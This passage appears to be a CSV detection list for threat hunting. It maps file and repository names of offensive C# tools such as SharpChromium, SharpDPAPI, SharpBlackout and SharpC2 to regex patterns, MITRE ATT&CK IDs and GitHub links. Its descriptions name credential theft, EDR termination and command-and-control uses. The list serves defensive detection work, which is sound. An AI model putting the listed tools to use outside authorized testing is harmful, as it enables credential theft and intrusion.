T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpApplocker.exe*",".{0,1000}\/SharpApplocker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpAzbelt.git*",".{0,1000}\/SharpAzbelt\.git.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*/SharpBlackout.git*",".{0,1000}\/SharpBlackout\.git.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*/SharpBlock.exe*",".{0,1000}\/SharpBlock\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpBuster.dll*",".{0,1000}\/SharpBuster\.dll.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","1","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*/SharpBuster.exe*",".{0,1000}\/SharpBuster\.exe.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","1","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*/SharpBypassUAC.exe*",".{0,1000}\/SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpC2*",".{0,1000}\/SharpC2.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/SharpCalendar/*.*",".{0,1000}\/SharpCalendar\/.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z" "*/SharpCat/*",".{0,1000}\/SharpCat\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","17","3","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" "*/SharpChisel.exe*",".{0,1000}\/SharpChisel\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpChrome.exe*",".{0,1000}\/SharpChrome\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpChromium.exe*",".{0,1000}\/SharpChromium\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpChromium.git*",".{0,1000}\/SharpChromium\.git.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","10","7","651","99","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z" "*/SharpCloud.exe*",".{0,1000}\/SharpCloud\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpCloud.git*",".{0,1000}\/SharpCloud\.git.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","159","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*/SharpCollection.git*",".{0,1000}\/SharpCollection\.git.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpCollection/*",".{0,1000}\/SharpCollection\/.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpCOM.exe*",".{0,1000}\/SharpCOM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpCompile/*",".{0,1000}\/SharpCompile\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*/sharpcompile_*.*",".{0,1000}\/sharpcompile_.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*/SharpCookieMonster.exe*",".{0,1000}\/SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpCradle/*",".{0,1000}\/SharpCradle\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","276","60","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*/SharpCrashEventLog.exe*",".{0,1000}\/SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpDir.exe*",".{0,1000}\/SharpDir\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpDomainSpray.git*",".{0,1000}\/SharpDomainSpray\.git.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*/SharpDoor.cs*",".{0,1000}\/SharpDoor\.cs.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*/SharpDoor.exe*",".{0,1000}\/SharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*/SharpDoor.git*",".{0,1000}\/SharpDoor\.git.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*/SharpDoor.git*",".{0,1000}\/SharpDoor\.git.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*/SharpDPAPI.exe*",".{0,1000}\/SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpDPAPI.git*",".{0,1000}\/SharpDPAPI\.git.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*/SharpDump*",".{0,1000}\/SharpDump.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/SharpDump.exe*",".{0,1000}\/SharpDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpEDRChecker-*.zip*",".{0,1000}\/SharpEDRChecker\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*/SharpEDRChecker.exe*",".{0,1000}\/SharpEDRChecker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharpEDRChecker.git*",".{0,1000}\/SharpEDRChecker\.git.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*/SharpEDRChecker/*",".{0,1000}\/SharpEDRChecker\/.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","8","7","656","94","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z" "*/SharpEfsPotato*",".{0,1000}\/SharpEfsPotato.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","1","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "*/SharPersist.exe*",".{0,1000}\/SharPersist\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/SharPersist.git*",".{0,1000}\/SharPersist\.git.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - 